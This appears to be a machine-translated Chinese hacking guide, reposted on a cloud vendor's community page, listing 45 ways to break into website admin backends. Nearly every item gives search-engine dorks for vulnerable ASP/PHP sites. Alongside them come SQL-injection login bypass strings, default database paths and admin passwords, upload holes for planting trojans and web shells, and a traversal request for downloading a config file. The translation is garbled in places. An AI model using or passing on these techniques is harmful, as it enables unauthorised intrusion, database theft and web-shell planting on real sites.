45 ways to hack back into the site

Source: Internet
Author: User
Tags ming vbulletin

45 ways to hack into the background
1, to Google search, site:cq.cn inurl:asp
2, to Google, search some keywords, edit.asp? Korean broiler is more, most of the MSSQL database!
3, the use of mining chickens and an ASP Trojan:
FileName is Login.asp
......
The path group is/manage/
The key word is went.asp
Use ' or ' = ' or ' to log in
4, the following this method because too many people have done, so some webmasters have to prevent the heart, the success rate is not high:
Keywords: "Co Net MIB Ver 1.0 website Backend Management System"
Account password is ' or ' = ' or '
5, dynamic shopping system, hehe. Think of the Ming Boy:
inurl:help.asp login, if not registered as a member!
Upload_bm1.asp and upload_c1.asp The two casually selected, the general administrator has ignored the 2 vulnerabilities.
6. Default Database Address Blogdata/acblog.asa
Keyword: acblog
7, Baidu/htdocs
The ASA file can be uploaded directly in the registration!
8,/database/#newasp. mdb
Key words: newasp sitemanagesystem Version
9, with Excavators
Keyword: Powered by webboy
Page:/upfile.asp
10, Baidu keyword search Ver5.0 Build 0519
(There is an upload vulnerability)
11, upfile_article.asp bbs/upfile.asp
Enter keywords: powered by Mypower,
What should be the upload vulnerability? More people than you can use.
Guess the kid, dig the chickens.
12, Inurl:winnt\system32\inetsrv\
Enter this in Google to find a lot of websites
13, now Google search keyword intitle: website small Assistant inurl:asp
14. Keywords: Home Latest news Beginner's Guide music download classic article player style equipment purchase station Rumors Friendship link this site forum
Digging chicken key word Tim setup.asp
15. vbulletin Forum Database
Default Database Address!
/includes/functions.php
Tools:
1) website Hunter. : Baidu google!
2) Google
Key words:
Powered By:vbulletin Version 3.0.1
Powered By:vbulletin Version 3.0.2
Powered By:vbulletin Version 3.0.3
One of them will do.
16
1) Open Baidu or Google search, enter powered by Comersus ASP Shopping Cart
Open source.
This is a mall system.
2) The bottom part of the website has a comersus Open Technologies LC. Open up and look at the ~~comersus system ~
guessed, Comersus.mdb. is the database name
The database is placed after the database/,
So Database/comersus.mdb
Comersus_listcategoriestree.asp replaced with Database/comersus.mdb, cannot be downloaded.
Then remove the former "store/" and add Database/comersus.mdb to try
Are the default database addresses
17, worry-free legendary official site procedures.
1) Admin Address: HTTP//Your domain/msmiradmin/
or HTTP//your domain name/admin.asp
2) Default Admin account: Msmir
3) Default admin password: Msmirmsmir or Msmir
The database file is HTTP.//your domain name/msmirdata/msmirarticle.mdb
or HTTP//your domain name/msmirdata/msmirarticle.asa
Database connection file is ***********/conn.asp
is also the default database address. Now the legendary 4F is a lot of this. Oh, I just got a good one.
18, Baidu input/skins/default/
19, the use of excavators
Key machine: Power by Discuz
Path:/wish.php
With:
discuz! Forum wish.php Remote Containment Vulnerability
......
20, upload the vulnerability.
Tool: Of course it's the Ming boy.
Website hunters or digging chickens.
Keyword Powered by mypower
Detected pages or files inserted upfile_photo.asp
The people who use it are also more than N.
21. New Cloud Vulnerability
This vulnerability Access and SQL Edition all-in-one.
Google search keywords "about this site – website Help – Advertising cooperation – Download statement – Link – Sitemap – Manage Login"
Submit the flash/downfile.asp?url=uploadfile/http://www.cnblogs.com/conn.asp to the Web site root directory. You can download conn.asp
To source code, software and other download stations are mostly.
People often touch the database if the front or the Middle + # can be replaced by the # can be downloaded
\database\ #newasp. mdb
such as: #xzws. mdb to #xzws.mdb
Collection of. Haven't tried ... – -!
22. All-in-all Mall + Power upload system
Use tool: Dig Chicken v1.1 Ming Boy
Mall intrusion:
Keywords: purchase, add shopping cart, go to the cashier, confirm the consignee information, and select the payment method---
Vulnerability page: upload.asp
Upfile_flash.asp
or upload a bug, take Webshell.
23. Injection loopholes
Baidu search Ioj ' s blog
24. Easy to move
Column Directory
Admin_articlerecyclebin.asp
Inurl:admin_articlerecyclebin.asp
25.
Tools: Website Hunter
Key words: inurl:Went.asp
Suffix: manage/login.asp
Password: ' or ' = ' or '
The software is not too familiar. – -
26.
Invasion of Warcraft
Required tools: ASP Trojan –-! That's nonsense.
Ming Boy
Keyword: All right Reserved Design: Game Alliance
Backstage Address: admin/login.asp
Address of the database: chngame/#chngame. mdb
are the default. Database make yourself to decrypt it not much to say.
27.
The vulnerability is a mistake that takes advantage of administrator IIS settings
Baidu keyword is a relatively rare foot name
Dynamic Network: reloadforumcache.asp
Leadbbs:makealltopanc.asp
BBSXP:admin_fso.asp
Moving easy: admin_articlerecyclebin.asp
It's not as clear as this.
28.
The loophole of the foreign station's explosive database
Keywords: sad Raven ' s guestbook
Password Address:/passwd.dat
Backstage Address:/admin.php
29.
Discuz 4.1.0 Cross-site vulnerability
Using tools: 1) WAP Browser
2) WAP Encoding Converter
Keyword: "intextiscuz! 4.1.0″
WAP browser .......!!!!!!!!!!!!!!
30.
Keyword: Channaix
Background path/system/manage.asp
Direct Transfer ASP Trojan
Excavator to go. – -!
31.
Tools
1: Website Hunter
2: Big Horse
Keywords: do not turn off the cookies function, otherwise you will not be able to log in
Insert Diy.asp
32.
Keywords: Team5 Studio all rights reserved
Default database: Data/team.mdb
The rest of them. No more talking.
33.
Tool: Excavator Assistant Database Reader
Keywords: Company Profile products Product List
Suffix added:/database/myszw.mdb
Backstage Address: admin/login.asp
are the default. The same. The database to make the password to solve their own. On the line. – -
34.
Key Sub XXX inurl:Nclass.asp
......
Write a Trojan horse in "system settings".
will be saved to the config.asp.
35.
Do not go backstage, still take the net Webshell
Data.asp?action=backupdata Network Database backup default path
Haven't tried ... I don't know.
36.
Tools: Website Hunter Webshell
Keyword: inurl:Went.asp
Suffix: manage/login.asp
Weak password: ' or ' = ' or '
Have never tried ...
37.
Keyword owered bycdn_news
Sweep through the article and add a ', to test the injection point
Backstage Address: admin_index.asp
I'm not going to tell you what the tools are.
38.
Invasion of the press release system
Keyword: leichinews
Remove the back of the leichinews.
Hit: admin/uploadpic.asp?actiontype=mod&picname=xuanran.asp
Re-upload the horse .....
Access Uppic anran.asp landing horse.
—-
Never tried. Sweat, collected.
39.
Tool excavators on the line.
Keyword ower System of article Management Ver 3.0 Build 20030628
Default database: Database\yiuwekdsodksldfslwifds.mdb
Backstage address: Scan yourself!
Tool Boy. - -! Why is he again?
MD5 own solution ....
(Nnd this one sweep a lot.) You can try it out. )
40.
First, search through Google to find a large number of injection points
Keyword: asp?id=1 gov.jp/asp?id=
Number of pages: 100
Language: If you want to invade which country, fill in any language.
41.
Keyword: Powered By:94kkbbs 2005
Retrieve admin with password retrieve function
Question: ddddd Answer: DDDDD
42.
Keyword: inurl:Went.asp
Backstage for manage/login.asp
Background password: ' or ' = ' or ' = ' or ' login into
Default Database Address Atabase/datashop.mdb
43.
Keyword: ****** inurl:readnews.asp
The last/change to \, direct Bauku, look at the password, into the background
Just add a news in the title to enter our word Trojan
44.
Tool: A word Trojan
BBSXP 5.0 SP1 Administrator guess Solver
Key words: Powered by bbsxp5.00
Back in the background, backup a word horse!
45.
Keywords: program core: Bjxshop Online shop experts
Backstage:/admin

45 ways to hack back into the site

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.